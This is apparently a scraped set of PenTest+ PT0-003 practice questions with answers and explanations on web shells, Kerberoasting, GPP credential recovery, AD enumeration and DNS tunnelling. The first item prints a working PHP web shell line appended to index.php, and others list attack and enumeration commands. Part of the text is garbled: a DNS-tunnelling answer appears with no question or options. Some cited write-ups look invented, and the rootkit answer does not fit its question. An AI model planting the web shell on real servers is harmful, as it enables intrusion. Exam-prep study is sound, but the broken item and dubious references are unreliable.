Practice Free PT0-003 Exam Online Questions
A penetration tester obtains a reverse shell on a server and executes the following command on the compromised server:
echo '<?php system($_GET["c"]); ?>' >> /var/www/public/index.php
Which of the following best explains what the penetration tester is trying to do?
- A . Prevent detection.
- B . Circumvent controls.
- C . Move laterally.
- D . Establish persistence.
D
Explanation:
The command appends PHP code to a web-accessible file, effectively creating a simple web shell. By adding system($_GET["c"]); into index.php, the tester can later execute operating system commands remotely through the web server by passing a parameter in the URL. This is most closely associated with establishing persistence, because it gives the tester a reusable method to regain command execution even if the original reverse shell session is lost. It is not primarily lateral movement, since the action is being performed on the already compromised host rather than expanding to another system. It is also not mainly about avoiding detection or bypassing a specific security control. The key objective is maintaining durable access through an alternate remote execution channel.
A penetration tester assesses an application allow list and has limited command-line access on the Windows system.
Which of the following would give the penetration tester information that could aid in continuing the test?
- A . mmc.exe
- B . icacls.exe
- C . nltest.exe
- D . rundll.exe
C
Explanation:
When a penetration tester has limited command-line access on a Windows system, the choice of tool is critical for gathering information to aid in furthering the test.
Here’s an explanation for each option:
mmc.exe (Microsoft Management Console):
Primarily used for managing Windows and its services. It’s not typically useful for gathering information about the system from the command line in a limited access scenario.
icacls.exe:
This tool is used for modifying file and folder permissions. While useful for modifying security settings, it does not directly aid in gathering system information or enumeration.
nltest.exe:
This is a powerful command-line utility for network testing and gathering information about domain controllers, trusts, and replication status.
Key functionalities include:
Listing domain controllers: nltest /dclist:<DomainName>
Querying domain trusts: nltest /domain_trusts
Checking secure channel: nltest /sc_query:<DomainName>
These capabilities make nltest very useful for understanding the network environment, especially in a domain context, which is essential for penetration testing.
rundll.exe:
This utility is used to run DLLs as programs. While it can be used for executing code, it does not provide direct information about the system or network environment.
Conclusion: nltest.exe is the best choice among the given options as it provides valuable information about the network, domain controllers, and trust relationships. This information is crucial for a penetration tester to plan further actions and understand the domain environment.
During an assessment, a penetration tester runs the following command:
setspn.exe -Q /
Which of the following attacks is the penetration tester preparing for?
- A . LDAP injection
- B . Pass-the-hash
- C . Kerberoasting
- D . Dictionary
C
Explanation:
Kerberoasting is an attack that involves requesting service tickets for service accounts from a Kerberos service, extracting the service tickets, and attempting to crack them offline to retrieve the plaintext passwords.
Understanding Kerberoasting:
Purpose: To obtain service account passwords by cracking the encrypted service tickets (TGS tickets) offline.
Service Principal Names (SPNs): SPNs are used in Kerberos authentication to uniquely identify a service instance.
Command Breakdown:
setspn.exe -Q /: This command queries all SPNs in the domain.
Use Case: Identifying accounts with SPNs that can be targeted for Kerberoasting.
Kerberoasting Steps:
Identify SPNs: Use setspn.exe to list service accounts with SPNs.
Request TGS Tickets: Request TGS tickets for the identified SPNs.
Extract Tickets: Use tools like Mimikatz to extract the service tickets.
Crack Tickets: Use password cracking tools like Hashcat to crack the extracted tickets offline.
Reference from Pentesting Literature:
Kerberoasting is a well-documented attack method in penetration testing guides, specifically targeting service accounts in Active Directory environments.
HTB write-ups often detail the use of Kerberoasting for gaining credentials from service accounts.
Reference: Penetration Testing – A Hands-on Introduction to Hacking; HTB Official Writeups
A penetration tester successfully phishes a user and compromises a domain-joined endpoint. The tester enumerates the domain controller and discovers that Group Policy Preferences are in use. The tester also finds that the version of the domain controllers is Windows Server 2012. The tester wants to use the fastest possible method of pivoting successfully to multiple production servers joined to the domain.
Which of the following is the best way to achieve this goal?
- A . Scan the domain controller and locate an RCE using a Metasploit module with a reverse shell.
- B . Run Hydra to password spray any dumped credentials from the initial host across subnets.
- C . Use BloodHound to look for escalation paths against the AD environment.
- D . Find the SYSVOL share for hashes with findstr /i and decrypt using the published key.
D
Explanation:
The correct answer is D. Find the SYSVOL share for hashes with findstr /i and decrypt using the published key.
Group Policy Preferences previously allowed administrators to store local user passwords in Group Policy XML files inside the domain’s SYSVOL share. These passwords were stored as cpassword values. Although encrypted, Microsoft published the AES key used to decrypt them, which means anyone with domain access could potentially retrieve and decrypt those credentials.
Because SYSVOL is commonly readable by authenticated domain users, a compromised domain-joined endpoint can be used to search SYSVOL for Group Policy Preference XML files containing cpassword values. Once decrypted, these credentials may provide local administrator access across multiple domain-joined systems, making this a fast method for pivoting to production servers.
A is incorrect because scanning the domain controller for remote code execution is noisy, risky, and not the fastest or best approach when Group Policy Preferences already expose a known credential-recovery path.
B is incorrect because password spraying with Hydra is slower, noisier, and may trigger account lockouts or detection. The scenario points specifically to Group Policy Preferences, which suggests credential recovery from SYSVOL.
C is incorrect because BloodHound is useful for identifying Active Directory attack paths, but it is not the fastest option when exploitable Group Policy Preference credentials are already known to be present.
In PenTest+ terms, this falls under Attacks and Exploits, specifically Active Directory post-exploitation, credential discovery, Group Policy Preferences abuse, and lateral movement.
A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client’s current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers.
Which of the following actions would the tester most likely take?
- A . Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.
- B . Perform an internal vulnerability assessment with credentials to review the internal attack surface.
- C . Use a generic vulnerability scanner to test the TTPs and review the results with the threat-modeling team.
- D . Perform a full internal penetration test to review all the possible exploits that could affect the systems.
A
Explanation:
BAS (Breach and Attack Simulation) tools are specifically designed to emulate multiple TTPs (Tactics, Techniques, and Procedures) used by adversaries. These tools can simulate various attack vectors in a controlled manner to test the effectiveness of an organization’s security defenses and response mechanisms.
Here’s why option A is the best choice:
Controlled Testing Environment: BAS tools provide a controlled environment where multiple TTPs can be tested without causing unintended damage to the internal systems and servers. This is critical when the threat-modeling team indicates potential impacts on internal systems.
Comprehensive Coverage: BAS tools are designed to cover a wide range of TTPs, allowing the penetration tester to simulate various attack scenarios. This helps in assessing the reactions (alerted, blocked, and others) by the client’s security tools comprehensively.
Feedback and Reporting: These tools provide detailed feedback and reporting on the effectiveness of the security measures in place, including which TTPs were detected, blocked, or went unnoticed. This information is invaluable for the threat-modeling team to understand the current security posture and areas for improvement.
Reference from Pentest:
Anubis HTB: This write-up highlights the importance of using controlled tools and methods for testing security mechanisms. BAS tools align with this approach by providing a controlled and systematic way to assess security defenses.
Forge HTB: Emphasizes the use of various testing tools and techniques to simulate real-world attacks and measure the effectiveness of security controls. BAS tools are mentioned as a method to ensure comprehensive coverage and minimal risk to internal systems.
Conclusion:
Using a BAS tool to test multiple TTPs allows for a thorough and controlled assessment of the client’s security tools’ effectiveness. This approach ensures that the testing is systematic, comprehensive, and minimally disruptive, making it the best choice.
A penetration tester would like to collect permission details for objects within the domain. The tester has a valid AD user and access to an internal PC.
Which of the following sets of steps is the best way for the tester to accomplish the desired outcome?
- A . Escalate privileges. Execute Rubeus. Run a Cypher query on Rubeus to get the results.
- B . Run SharpHound. Install CrackMapExec. Perform a CrackMapExec database query on CME to get the results.
- C . Run SharpHound. Install BloodHound. Perform a Cypher query on BloodHound to get the results.
- D . Escalate privileges. Get Windows Registry data. Perform a query to get results.
C
Explanation:
To collect permission details for objects within an Active Directory domain, the PenTest+ workflow most closely aligns with using SharpHound (the BloodHound data collector) followed by BloodHound analysis. SharpHound is executed from a domain-joined or internally reachable system using a valid AD account to enumerate domain relationships, including group membership, sessions, local admin rights, and, most importantly for this question, object control and ACL-based permissions (for example, rights that allow modifying users, resetting passwords, adding group members, or controlling GPOs). BloodHound then imports this collected graph data and allows the tester to run Cypher queries to identify effective privileges, abuse paths, and misconfigurations that enable privilege escalation or lateral movement.
Rubeus is primarily focused on Kerberos ticket operations (TGT/TGS manipulation, roasting, delegation abuse) and is not a Cypher-query permission-mapping platform. CrackMapExec supports network/AD operations, but it is not the standard toolchain for graph-based permission path analysis described in PenTest+. Registry collection is unrelated to enumerating domain object permissions.
A penetration tester conducts a scan on an exposed Linux web server and gathers the following data:
Host: 192.168.55.23
Open Ports:
22/tcp Open OpenSSH 7.2p2 Ubuntu 4ubuntu2.10
80/tcp Open Apache httpd 2.4.18 (Ubuntu)
111/tcp Open rpcbind 2-4 (RPC #100000)
Additional notes:
Directory listing enabled on /admin
Apache mod_cgi enabled
No authentication required to access /cgi-bin/debug.sh
X-Powered-By: PHP/5.6.40-0+deb8u12
Which of the following is the most effective action to take?
- A . Launch a payload using msfvenom and upload it to the /admin directory.
- B . Review the contents of /cgi-bin/debug.sh.
- C . Use Nikto to scan the host and port 80.
- D . Attempt a brute-force attack against OpenSSH 7.2p2.
B
Explanation:
The most effective next action is to investigate /cgi-bin/debug.sh because it is a direct, high-signal finding: a server-side script in a CGI-enabled directory that is reachable without authentication. In PenTest+ enumeration methodology, testers prioritize items that are both accessible and likely to yield immediate impact, such as unauthenticated administrative/debug endpoints, exposed scripts, and functionality that could enable command execution or information disclosure. A debug shell script exposed through cgi-bin is a classic candidate for sensitive data leakage (paths, environment variables, credentials) or unsafe parameter handling that can lead to remote command execution, especially when mod_cgi is enabled and the file is callable over HTTP.
By comparison, uploading an msfvenom payload assumes a write primitive to /admin and an execution path, neither of which is established by the findings. Nikto can be useful, but it is redundant compared to the specific, actionable lead already identified. Brute-forcing SSH is noisy, may violate rules of engagement, and is less efficient than testing an unauthenticated web-exposed script first.
During a routine penetration test, the client’s security team observes logging alerts that indicate several ID badges were reprinted after working hours without authorization.
Which of the following is the penetration tester most likely trying to do?
- A . Obtain long-term, valid access to the facility
- B . Disrupt the availability of facility access systems
- C . Change access to the facility for valid users
- D . Revoke access to the facility for valid users
A
Explanation:
The unauthorized reprinting of ID badges suggests the penetration tester is attempting physical security penetration testing to gain long-term access.
Option A (Obtain long-term, valid access) ✅ : Correct. Cloning or reprinting badges allows persistent access past security checks.
Option B (Disrupt availability) ❌ : There is no indication of a denial-of-service attack.
Option C (Change access for valid users) ❌ : The goal is not modifying user access, but rather gaining unauthorized access.
Option D (Revoke access for valid users) ❌ : The logs show new badges being printed, not revocation.
Reference: CompTIA PenTest+ PT0-003 Official Guide – Physical Security Testing
Answer A
An increase in DNS traffic during a penetration test suggests data exfiltration using DNS tunneling, a method where attackers encode data into DNS queries to avoid detection.
Option A (Covert data exfiltration) ✅ : Correct. DNS tunneling (e.g., dnscat2, Iodine) is a stealthy method to bypass firewalls and extract sensitive data.
Option B (URL spidering) ❌ : Would cause increased web traffic, not DNS requests.
Option C (HTML scraping) ❌ : Involves parsing web pages, not DNS traffic.
Option D (DoS attack) ❌ : DoS floods bandwidth or servers, but does not increase DNS queries significantly.
Reference: CompTIA PenTest+ PT0-003 Official Guide – DNS Tunneling & Data Exfiltration
During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software.
Which of the following host-based attacks should the tester use?
- A . On-path
- B . Logic bomb
- C . Rootkit
- D . Buffer overflow
C
Explanation:
A rootkit is a type of malicious software designed to provide an attacker with unauthorized access to a computer system while concealing its presence. Rootkits achieve this by modifying the host’s operating system or other software to hide their existence, allowing the attacker to maintain control over the system without detection.
Definition and Purpose:
Rootkits are primarily used to gain and maintain root access (administrative privileges) on a system.
They disguise themselves as legitimate software or integrate deeply into the operating system to avoid detection.
Mechanisms of Action:
Kernel Mode Rootkits: These operate at the kernel level, which is the core of the operating system, making them very powerful and hard to detect.
User Mode Rootkits: These run in the same space as user applications, intercepting and altering standard system API calls to hide their presence.
Bootkits: These infect the Master Boot Record (MBR) or Volume Boot Record (VBR) and load before the operating system, making them extremely difficult to detect and remove.
Detection and Prevention:
Detection Tools: Tools like RootkitRevealer, Chkrootkit, and rkhunter can help in identifying rootkits.
Prevention: Regular system updates, use of strong antivirus and anti-malware solutions, and integrity checking tools like Tripwire can help in preventing rootkit infections.
Real-World Examples:
Sony BMG Rootkit: In 2005, Sony BMG included a rootkit in their digital rights management (DRM) software on music CDs. The rootkit hid files and processes, leading to a major scandal when it was discovered.
Stuxnet: This sophisticated worm included a rootkit component to hide its presence on infected systems, making it one of the most infamous examples of rootkit use in a cyber attack.
Reference from Pentesting Literature:
In "Penetration Testing – A Hands-on Introduction to Hacking" by Georgia Weidman, rootkits are discussed in the context of post-exploitation, where maintaining access to the compromised system is crucial.
Various HTB write-ups, such as the analysis of complex attacks involving multiple stages of exploitation, often highlight the use of rootkits in maintaining persistent access.
Reference: Penetration Testing – A Hands-on Introduction to Hacking; HTB Official Writeups on sophisticated attacks
Which of the following authorizations is mandatory when a penetration tester is involved in a complex IT infrastructure?
- A . Customer authorization
- B . Penetration tester authorization
- C . Third-party authorization
- D . Internal team authorization
A
Explanation:
Before any penetration testing begins, especially in a complex IT infrastructure involving multiple systems, cloud environments, and potentially shared platforms, a formal written authorization from the customer (client organization) is mandatory.
This authorization defines the scope, targets, timeframes, and limitations of the assessment and ensures legal protection for both the tester and the organization. Conducting testing without explicit client authorization could violate laws (e.g., Computer Fraud and Abuse Act in the U.S.) and corporate policies.
Why not the others:
B. Penetration tester authorization: The tester cannot authorize their own actions; authorization must come from the system owner.
C. Third-party authorization: Only relevant if the third party owns the infrastructure; otherwise, it’s not mandatory.
D. Internal team authorization: Internal teams may coordinate logistics, but legal authorization must come from the customer/asset owner.
CompTIA PT0-003 Objective Mapping:
Domain 1.0: Planning and Scoping
